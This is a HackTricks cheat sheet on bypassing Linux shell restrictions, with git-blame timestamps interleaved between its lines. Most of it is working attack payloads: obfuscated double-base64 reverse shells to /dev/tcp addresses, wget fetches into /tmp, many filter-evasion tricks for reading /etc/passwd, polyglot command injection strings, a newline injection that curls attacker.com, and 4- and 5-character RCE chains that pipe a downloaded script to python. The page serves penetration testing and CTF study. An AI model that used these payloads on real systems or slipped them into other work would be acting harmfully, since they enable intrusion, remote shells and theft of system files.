2022-05-07 13:38:40 +00:00
# Bypass Linux Shell Restrictions
2022-04-28 16:01:33 +00:00
< details >
< summary > < strong > Support HackTricks and get benefits!< / strong > < / summary >
2022-09-30 10:27:15 +00:00
* Do you work in a **cybersecurity company** ? Do you want to see your **company advertised in HackTricks** ? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF** ? Check the [**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop )!
* Discover [**The PEASS Family** ](https://opensea.io/collection/the-peass-family ), our collection of exclusive [**NFTs** ](https://opensea.io/collection/the-peass-family )
* Get the [**official PEASS & HackTricks swag** ](https://peass.creator-spring.com )
* **Join the** [**💬** ](https://emojipedia.org/speech-balloon/ ) [**Discord group** ](https://discord.gg/hRep4RUj7f ) or the [**telegram group** ](https://t.me/peass ) or **follow** me on **Twitter** [**🐦** ](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md )[**@carlospolopm** ](https://twitter.com/carlospolopm )**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo** ](https://github.com/carlospolop/hacktricks )**.**
2022-04-28 16:01:33 +00:00
< / details >
2022-09-30 10:43:59 +00:00
< img src = "../../.gitbook/assets/image (10).png" alt = "" data-size = "original" >
2022-06-06 22:28:05 +00:00
2022-09-27 00:18:19 +00:00
**Security Skills as a Service** platform bridges the current skill set gap by combining **global offensive security talent with smart automation** , providing real-time data you need to make informed decisions.
2022-06-06 22:28:05 +00:00
2022-09-27 00:18:19 +00:00
{% embed url="https://www.syncubes.com/" %}
2022-06-06 22:28:05 +00:00
2022-05-07 13:38:40 +00:00
## Common Limitations Bypasses
2022-04-28 16:01:33 +00:00
2022-05-07 13:38:40 +00:00
### Reverse Shell
2021-02-17 12:02:24 +00:00
```bash
2021-02-16 22:44:45 +00:00
# Double-Base64 is a great way to avoid bad characters like +, works 99% of the time
2021-02-16 23:15:57 +00:00
echo "echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>& 1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g'
2022-02-12 12:08:47 +00:00
#echo\WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|ba''se''6''4${IFS}-''d|ba''se''64${IFS}-''d|b''a''s''h
2021-02-16 22:44:45 +00:00
```
2021-02-17 12:02:24 +00:00
2022-05-07 13:38:40 +00:00
### Short Rev shell
2021-03-30 00:10:09 +00:00
```bash
2021-03-30 08:00:11 +00:00
#Trick from Dikline
2021-03-30 00:10:09 +00:00
#Get a rev shell with
(sh)0>/dev/tcp/10.10.10.10/443
#Then get the out of the rev shell executing inside of it:
exec >& 0
```
2022-05-07 13:38:40 +00:00
### Bypass Paths and forbidden words
2021-02-17 12:02:24 +00:00
```bash
2021-02-16 22:44:45 +00:00
# Question mark binary substitution
/usr/bin/p?ng # /usr/bin/ping
nma? -p 80 localhost # /usr/bin/nmap -p 80 localhost
# Wildcard(*) binary substitution
/usr/bin/who*mi # /usr/bin/whoami
# Wildcard + local directory arguments
touch -- -la # -- stops processing options after the --
ls *
# [chars]
/usr/bin/n[c] # /usr/bin/nc
# Quotes / Concatenation
'p'i'n'g # ping
"w"h"o"a"m"i # whoami
\u\n\a\m\e \-\a # uname -a
ech''o test # echo test
ech""o test # echo test
bas''e64 # base64
2021-04-12 09:10:24 +00:00
/\b\i\n/////s\h
2021-04-20 07:42:08 +00:00
# Execution through $0
2021-04-12 09:10:24 +00:00
echo whoami|$0
2021-02-16 22:44:45 +00:00
# Uninitialized variables: A uninitialized variable equals to null (nothing)
cat$u /etc$u/passwd$u # Use the uninitialized variable without {} before any symbol
p${u}i${u}n${u}g # Equals to ping, use {} to put the uninitialized variables between valid characters
# Fake commands
p$(u)i$(u)n$(u)g # Equals to ping but 3 errors trying to execute "u" are shown
w`u`h`u`o`u`a`u`m`u`i # Equals to whoami but 5 errors trying to execute "u" are shown
# Concatenation of strings using history
!-1 # This will be substitute by the last command executed, and !-2 by the penultimate command
mi # This will throw an error
whoa # This will throw an error
!-1!-2 # This will execute whoami
2020-07-15 15:43:14 +00:00
```
2022-05-07 13:38:40 +00:00
### Bypass forbidden spaces
2021-02-17 12:02:24 +00:00
```bash
2021-02-16 22:44:45 +00:00
# {form}
{cat,lol.txt} # cat lol.txt
{echo,test} # echo test
2020-07-15 15:43:14 +00:00
2022-05-01 12:41:36 +00:00
# IFS - Internal field separator, change " " for any other character ("]" in this case)
2021-02-16 22:44:45 +00:00
cat${IFS}/etc/passwd # cat /etc/passwd
cat$IFS/etc/passwd # cat /etc/passwd
2020-07-15 15:43:14 +00:00
2021-02-16 22:44:45 +00:00
# Put the command line in a variable and then execute it
2020-07-15 15:43:14 +00:00
IFS=];b=wget]10.10.14.21:53/lol]-P]/tmp;$b
2021-02-16 22:44:45 +00:00
IFS=];b=cat]/etc/passwd;$b # Using 2 ";"
IFS=,;`cat< < < cat , / etc / passwd ` # Using cat twice
# Other way, just change each space for ${IFS}
2020-07-15 15:43:14 +00:00
echo${IFS}test
2021-02-16 22:44:45 +00:00
# Using hex format
2020-07-15 15:43:14 +00:00
X=$'cat\x20/etc/passwd'&& $X
2021-02-16 22:44:45 +00:00
# New lines
2020-07-15 15:43:14 +00:00
p\
i\
n\
2021-02-23 21:39:56 +00:00
g # These 4 lines will equal to ping
2020-07-15 15:43:14 +00:00
2022-05-01 12:41:36 +00:00
# Undefined variables and !
2021-02-16 22:44:45 +00:00
$u $u # This will be saved in the history and can be used as a space, please notice that the $u variable is undefined
uname!-1\-a # This equals to uname -a
2020-07-15 15:43:14 +00:00
```
2022-05-07 13:38:40 +00:00
### Bypass backslash and slash
2021-04-12 09:10:24 +00:00
```bash
cat ${HOME:0:1}etc${HOME:0:1}passwd
cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
```
2022-05-07 13:38:40 +00:00
### Bypass with hex encoding
2021-04-12 09:10:24 +00:00
```bash
echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"`
abc=$'\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64';cat abc
`echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`
cat `xxd -r -p <<< 2f6574632f706173737764`
xxd -r -ps < (echo 2f6574632f706173737764)
cat `xxd -r -ps <(echo 2f6574632f706173737764)`
```
2022-05-07 13:38:40 +00:00
### Bypass IPs
2021-02-17 12:02:24 +00:00
```bash
2021-02-16 22:44:45 +00:00
# Decimal IPs
2020-07-15 15:43:14 +00:00
127.0.0.1 == 2130706433
```
2022-05-07 13:38:40 +00:00
### Time based data exfiltration
2021-04-12 09:10:24 +00:00
```bash
time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
```
2022-05-07 13:38:40 +00:00
### DNS data exfiltration
2021-04-12 09:10:24 +00:00
2022-01-31 14:51:03 +00:00
You could use **burpcollab** or [**pingb** ](http://pingb.in ) for example.
2021-04-12 09:10:24 +00:00
2022-07-01 18:11:43 +00:00
### Builtins
In case you cannot execute external functions and only have access to a **limited set of builtins to obtain RCE** , there are some handy tricks to do it. Usually you **won't be able to use all** of the **builtins** , so you should **know all your options** to try to bypass the jail. Idea from [**devploit** ](https://twitter.com/devploit ).\
2022-07-01 18:14:59 +00:00
First of all check all the [**shell builtins** ](https://www.gnu.org/software/bash/manual/html\_node/Shell-Builtin-Commands.html )**.** Then here you have some **recommendations** :
2022-07-01 18:11:43 +00:00
```bash
# Get list of builtins
declare builtins
# In these cases PATH won't be set, so you can try to set it
2022-07-01 18:22:24 +00:00
PATH="/bin" /bin/ls
2022-07-01 18:11:43 +00:00
export PATH="/bin"
declare PATH="/bin"
2022-07-01 18:22:24 +00:00
SHELL=/bin/bash
2022-07-01 18:11:43 +00:00
# Hex
$(echo -e "\x2f\x62\x69\x6e\x2f\x6c\x73")
$(echo -e "\x2f\x62\x69\x6e\x2f\x6c\x73")
# Input
read aaa; exec $aaa #Read more commands to execute and execute them
read aaa; eval $aaa
# Get "/" char using printf and env vars
printf %.1s "$PWD"
## Execute /bin/ls
$(printf %.1s "$PWD")bin$(printf %.1s "$PWD")ls
## To get several letters you can use a combination of printf and
declare
declare functions
declare historywords
# Read flag in current dir
source f*
flag.txt:1: command not found: CTF{asdasdasd}
# Get env variables
declare
# Get history
history
declare history
declare historywords
```
2022-05-07 13:38:40 +00:00
### Polyglot command injection
2021-04-12 09:10:24 +00:00
```bash
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
```
2022-06-23 12:12:25 +00:00
### Bypass potential regexes
```bash
# A regex that only allow letters and numbers migth be vulnerable to new line characters
1%0a`curl http://attacker.com`
```
### RCE with 5 chars
```bash
# From the Organge Tsai BabyFirst Revenge challenge: https://github.com/orangetw/My-CTF-Web-Challenges#babyfirst-revenge
#Oragnge Tsai solution
## Step 1: generate `ls -t>g` to file "_" to be able to execute ls ordening names by cration date
http://host/?cmd=>ls\
http://host/?cmd=ls>_
http://host/?cmd=>\ \
http://host/?cmd=>-t\
http://host/?cmd=>\>g
http://host/?cmd=ls>>_
## Step2: generate `curl orange.tw|python` to file "g"
## by creating the necesary filenames and writting that content to file "g" executing the previous generated file
http://host/?cmd=>on
http://host/?cmd=>th\
http://host/?cmd=>py\
http://host/?cmd=>\|\
http://host/?cmd=>tw\
http://host/?cmd=>e.\
http://host/?cmd=>ng\
http://host/?cmd=>ra\
http://host/?cmd=>o\
http://host/?cmd=>\ \
http://host/?cmd=>rl\
http://host/?cmd=>cu\
http://host/?cmd=sh _
# Note that a "\" char is added at the end of each filename because "ls" will add a new line between filenames whenwritting to the file
## Finally execute the file "g"
http://host/?cmd=sh g
# Another solution from https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/
# Instead of writing scripts to a file, create an alphabetically ordered the command and execute it with "*"
https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/
## Execute tar command over a folder
http://52.199.204.34/?cmd=>tar
http://52.199.204.34/?cmd=>zcf
http://52.199.204.34/?cmd=>zzz
http://52.199.204.34/?cmd=*%20/h*
# Another curiosity if you can read files of the current folder
ln /f*
## If there is a file /flag.txt that will create a hard link
## to it in the current folder
```
### RCE with 4 chars
```bash
# In a similar fashion to the previous bypass this one just need 4 chars to execute commands
# it will follow the same principle of creating the command `ls -t>g` in a file
# and then generate the full command in filenames
# generate "g> ht- sl" to file "v"
'>dir'
'>sl'
'>g\>'
'>ht-'
'*>v'
# reverse file "v" to file "x", content "ls -th >g"
'>rev'
'*v>x'
# generate "curl orange.tw|python;"
'>\;\\'
'>on\\'
'>th\\'
'>py\\'
'>\|\\'
'>tw\\'
'>e.\\'
'>ng\\'
'>ra\\'
'>o\\'
'>\ \\'
'>rl\\'
'>cu\\'
# got shell
'sh x'
'sh g'
```
2022-05-29 10:08:58 +00:00
## Read-Only/Noexec Bypass
2022-05-07 13:38:40 +00:00
If you are inside a filesystem with the **read-only and noexec protections** there are still ways to **execute arbitrary binaries** . One of them is by the use of **DDexec** , yo can find an explanation of the technique in:
2022-05-07 19:19:13 +00:00
{% content-ref url="../bypass-linux-shell-restrictions/ddexec.md" %}
[ddexec.md ](../bypass-linux-shell-restrictions/ddexec.md )
2022-05-07 13:38:40 +00:00
{% endcontent-ref %}
## References & More
2020-07-15 15:43:14 +00:00
2022-06-06 22:28:05 +00:00
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits )
* [https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet ](https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet )
* [https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0 ](https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0 )
* [https://www.secjuice.com/web-application-firewall-waf-evasion/ ](https://www.secjuice.com/web-application-firewall-waf-evasion/ )
2021-02-17 12:02:24 +00:00
2022-09-30 10:43:59 +00:00
< img src = "../../.gitbook/assets/image (10).png" alt = "" data-size = "original" >
2021-02-17 12:02:24 +00:00
2022-09-27 00:18:19 +00:00
**Security Skills as a Service** platform bridges the current skill set gap by combining **global offensive security talent with smart automation** , providing real-time data you need to make informed decisions.
2020-07-15 15:43:14 +00:00
2022-09-27 00:18:19 +00:00
{% embed url="https://www.syncubes.com/" %}
2022-04-28 16:01:33 +00:00
< details >
< summary > < strong > Support HackTricks and get benefits!< / strong > < / summary >
2022-09-30 10:27:15 +00:00
* Do you work in a **cybersecurity company** ? Do you want to see your **company advertised in HackTricks** ? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF** ? Check the [**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop )!
* Discover [**The PEASS Family** ](https://opensea.io/collection/the-peass-family ), our collection of exclusive [**NFTs** ](https://opensea.io/collection/the-peass-family )
* Get the [**official PEASS & HackTricks swag** ](https://peass.creator-spring.com )
* **Join the** [**💬** ](https://emojipedia.org/speech-balloon/ ) [**Discord group** ](https://discord.gg/hRep4RUj7f ) or the [**telegram group** ](https://t.me/peass ) or **follow** me on **Twitter** [**🐦** ](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md )[**@carlospolopm** ](https://twitter.com/carlospolopm )**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo** ](https://github.com/carlospolop/hacktricks )**.**
2022-04-28 16:01:33 +00:00
< / details >